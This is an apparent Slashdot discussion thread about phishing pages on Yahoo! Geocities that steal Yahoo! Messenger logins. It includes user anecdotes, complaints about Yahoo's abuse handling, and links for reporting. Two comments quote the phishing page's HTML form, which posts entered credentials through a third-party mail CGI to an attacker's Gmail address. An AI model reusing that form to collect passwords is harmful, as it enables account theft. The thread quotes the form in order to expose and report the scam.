Phishing in Yahoo! Geocities? 54
Van Cutter Romney asks: "I've received a lot of phishing IMs on my Yahoo! Messenger from contacts whose accounts I guess have been hacked into. All the phishing messages lead to Geocities websites like this where the user is displayed a Yahoo! login page. For most people, the page looks legitimate and they enter their Yahoo! username and password (I was nearly fooled once). Since both the website (Geocities) and the messenger belong to Yahoo!, I'd like to know if they are doing to anything to counter these attacks."
Slashdot asks Van Cutter Romney (Score:3, Funny)
Re:Slashdot asks Van Cutter Romney (Score:1)
Re:Slashdot asks Van Cutter Romney (Score:5, Informative)
Re:Slashdot asks Van Cutter Romney (Score:1)
Thank you for calling the Mr. Obvious show! (Score:2, Funny)
"NOTICE: We collect personal information on this site."
Ya think?!?
I never made the connection! Thanks Mr. Obvious!
something to do (Score:4, Interesting)
<FORM METHOD="POST" ACTION="http://www2.fiberbit.net/form/mailto.cgi" ENCTYPE="x-www-form-urlencoded">
<INPUT TYPE="hidden" NAME="Mail_From" VALUE="Yahoo">
<INPUT TYPE="hidden" NAME="Mail_To" VALUE="havinfunfun@gmail.com">
<INPUT TYPE="hidden" NAME="Mail_Subject" VALUE="Yahoo id">
I'm sure google would have a fun time going after whoever referred havinfunfun@gmail.com.
Re:something to do (Score:2)
Just report to gmail's abuse! (Score:2)
I knew there was something strange going on... (Score:4, Funny)
Re:I knew there was something strange going on... (Score:5, Funny)
I remained silent;
I was not a username.
When they locked up the passwords,
I remained silent;
I was not a password.
When they came for people with sexual orientation,
I did not speak out;
Because I have no idea what that means.
When they came for me,
there was no one left to speak out.
Re:I knew there was something strange going on... (Score:2)
I did not speak out;
Because I have no idea what that means.
I guess you weren't invited to the debriefing.
Re:I knew there was something strange going on... (Score:1)
Re:Dear Penthouse Forum (Score:1)
"Hello, Mr. Semel it looks like your hosting service and IM are under attack. Dinner on Saturday night? Oh, that sounds like a wonderful idea!"
Atleast this way, someone's going to take notice.
I logged in... (Score:3, Funny)
What gives?
Someone's asleep at the wheel. (Score:5, Funny)
Excellent joke (Score:2, Funny)
Ill be honest. I spent all that time to trying to figure out how the website was trying scam people out of money. Then I realized that it was nothing more that a pun. Great job and very subtle and it somehow being modded insightful made it even more funnyy.
Try Right Clicking the Screen (Score:2, Insightful)
Also consider the SSL link seems to not be phished. I tried dummy data in both login forms and it said "Page Not Found" for the phished page that was not secured, while it said "ID not found" when I entered the information on SSL site. Someone should report the site http://www2.fiberbit.net/ [fiberbit.net] to the domain registrar since the form submissi
From the phishing website... (Score:2)
Not only does Flickr make you smell better, it also makes you more attractive.
Oh yeah, I read the title wrong too... (Score:2)
I left him a message (Score:3, Funny)
Username: ohgodatleastspendthe
Password: $5foradomainname
The destination page is a 404 (I don't think it works?).
old news... (Score:1, Redundant)
You are about 8 months late!
I initially was told that all you had to do was go to the site, by my roommate, but after a while found out he lied to me, and he logged in like this guy posted.
I've since got him the netcraft toolbar, which tells and can block you from going to phish sites, or at least warn you about it.
Ummm (Score:5, Insightful)
Maybe I'm missing something, but why the hell are you asking us?
Re:Ummm (Score:2)
Maybe he expects us to take them down via the slashdot effect.
Terms of service (Score:5, Informative)
Geocities is a kinda abandoned place (So much that webcomics make fun of it [nyud.net]). There's no customer service, everything's automated there. The only thing that (I hope) isn't, is the "report offensive page" etc. The only change done to it was aesthetic and in the code. But the infrastructure remains.
In other words, geocities servers do NOT have personnel searching and identifying phishing sites on them. They have to rely on the users.
(This and popup ads led to the fall of free homepages. Most pages now are categorized in specialized sites: webcomics, blogs, art, fiction, and with youtube, videos).
This was bound to happen sooner or later. Yahoo neglected geocities, is it a mystery that it became a meeting point for illegal activities?
Re:Terms of service (Score:1)
Fixed in the next version (Score:1)
havinfunfun@gmail.com (Score:2)
Subject: "Yahoo id"
the URL for the mail form thats used is: http://www2.fiberbit.net/form/mailto.cgi [fiberbit.net]
Wonder if gmail/google should do something too (Score:2)
Extract:
<FORM METHOD="POST" ACTION="http://www2.fiberbit.net/form/mailto.cgi" ENCTYPE="x-www-form-urlencoded">
<INPUT TYPE="hidden" NAME="Mail_From" VALUE="Yahoo">
<INPUT TYPE="hidden" NAME="Mail_To" VALUE="havinfunfun@gmail.com">
<INPUT TYPE="hidden" NAME="Mail_Subject" VALUE="Yahoo
Address to report it to (Score:2, Informative)
Security problems (Score:1, Interesting)
yes, we are (Score:3, Informative)
We do have teams of people who work to fight any abuse of any of our products. When sites like those are found, they are taken down.
Please report any instances of situations like those you described to:
http://abuse.yahoo.com/ [yahoo.com] or abuse@yahoo-inc.com
Re:yes, we are (Score:2, Funny)
Re:yes, we are (Score:2)
Sorry if I sound snippy, but do you have even a single person acting to prevent abuse?
I realize that Geocities doesn't bring you any revenue, but Yahoo's business hosting has become such an open sewer of phishing and scams, that I couldn't consider hosting there for a nanosecond, let alone recommend it to anyone else.
Re:yes, we are- unblock/'man' abuse@yahoo.com 1st! (Score:2)
Unblock and properly 'man' abuse@yahoo.com and abuse@yahoo-inc.com then we'll talk about stopping user wrongdoing at Yahoo!
Proof from rfc-ignorant.org:
http://www.rfc-ignorant.org/tools/detail.php?domai n=yahoo.com&submitted=1123294881&table=abuse [rfc-ignorant.org]
http://www.rfc-ignorant.org/tools/detail.php?domai n=yahoo-inc.com&submitted=1123294118&table=abuse [rfc-ignorant.org]
You corporate tool...
As are about all gain
Oh, C'mon!!!... (Score:3, Informative)
There are script-kiddies and S/N stealers that constantly use geocities pages to host everything from phishing pages to outright trojan
There is a subgroup of huge-egoed "1337" yahoo chatters that deal in stolen screen names and "illegal" or "illy" names in trade for other names, or straight cash.
Yahoo seems to pay no attention whatsoever to their abuse reporting system. I've reported a geocities page hosting a trojan multiple times, and the site remained up for over a year, with the same trojan
One of the biggest things driving this subgroup of crackers and script-kiddies are the chat-bot spammers, who buy lists of stolen screen-names/accounts on which to log-on their spam/porn bots. There is an entire underground economy of stolen accounts/screen-names much larger and much older than any of the MMORPG gold trader/seller economies that have gotten so much press of late.
I think Yahoo, despite all of their denials, are in bed with the spam/porn-bot operators, and turn a blind eye, even protecting them. I know people who chat on Yahoo that run "booter" programs that will kick/flood a chatter out of a room, even completely disconnect someone from Yahoo. They regularly boot normal chatters with impunity, but fear to boot "porn/spam-bots", as Yahoo will quickly shut down the booters' "bot" account(s) (most 'booter' programs utilise 'bots' to send their disconnect packets/IM floods/etc) and even ban the booter-operators' account and block that IP address.
If I were this fellow, I'd consider myself lucky that the only thing he got from a geocities webpage was a phishing page, as opposed to a virus or trojan with much more serious and far-reaching consequences than having a Yahoo screen-name/account cracked or stolen.
Cheers!
Strat
Been there, done that. (Score:3, Interesting)
I wasn't fully awake to notice the URLs because it was the middle of the night. I got a YM IM in my Trillian from someone whom I haven't heard from for months. It went like this (note: actual account/user names changed from their original ones):
Session Start (ant:onion): Sat Jan 07 02:28:11 2006
[02:28] onion: Hey check out this website for some photos of me tell me what you think http://www.myphoto-album.tk/ [myphoto-album.tk]
[02:28] *** Auto-response sent to onion: ant isn't around here at the moment.
[03:03] ant: I don't see anything even after logging in.
[03:03] *** You are currently disconnected. Messages will not be received.
[03:03] *** You are currently disconnected. Messages will not be received.
[03:04] *** You are currently disconnected. Messages will not be received.
[03:04] *** You are currently disconnected. Messages will not be received.
Session Close (onion): Sat Jan 07 03:07:05 2006
I thought YM servers went down or something. In the day time, it hit me. I got phished! My password was already changed (duh!).
I quickly e-mailed Yahoo! A few days later, Y! asked for my information that I used to sign up. The problem here was I never used real personal datas in online accounts like Y! nor do I remember them. Plus, I signed up for my account like a decade ago.
My buddies on the contact list (had a local back up copy so easy to contact) all got this phish. I already warned them not to reply. But some of them were too late and actually fell for it.
I continued to e-mail Y!, but got no where. I eventually gave up and them told to shut down my account. However, Y! still refused. Of course, my buddies saw the fake me and phish IMs. Eventually, I told all my buddies fill out the online abuse forms to Yahoo!'s abuse department to shut down my account for phishing. Then, I never heard of more online sightings and phishings from my account.
Here were two Web sites that were for collecting passwords (also contacted the hosts about my incidents). These fake Y!'s GeoCities were gone within days:
www.my-photo-albums.tk
www.myphoto-album.tk
I was glad I didn't use Yahoo account other than IM and launch.com. I hate these bundled services within a single account like Passport.
As you can see social engineering at its best even on people who knows computers. I fell for it.
Re:Been there, done that. (Score:3, Informative)
Fried Phish (PIRT) (Score:1)
h [castlecops.com]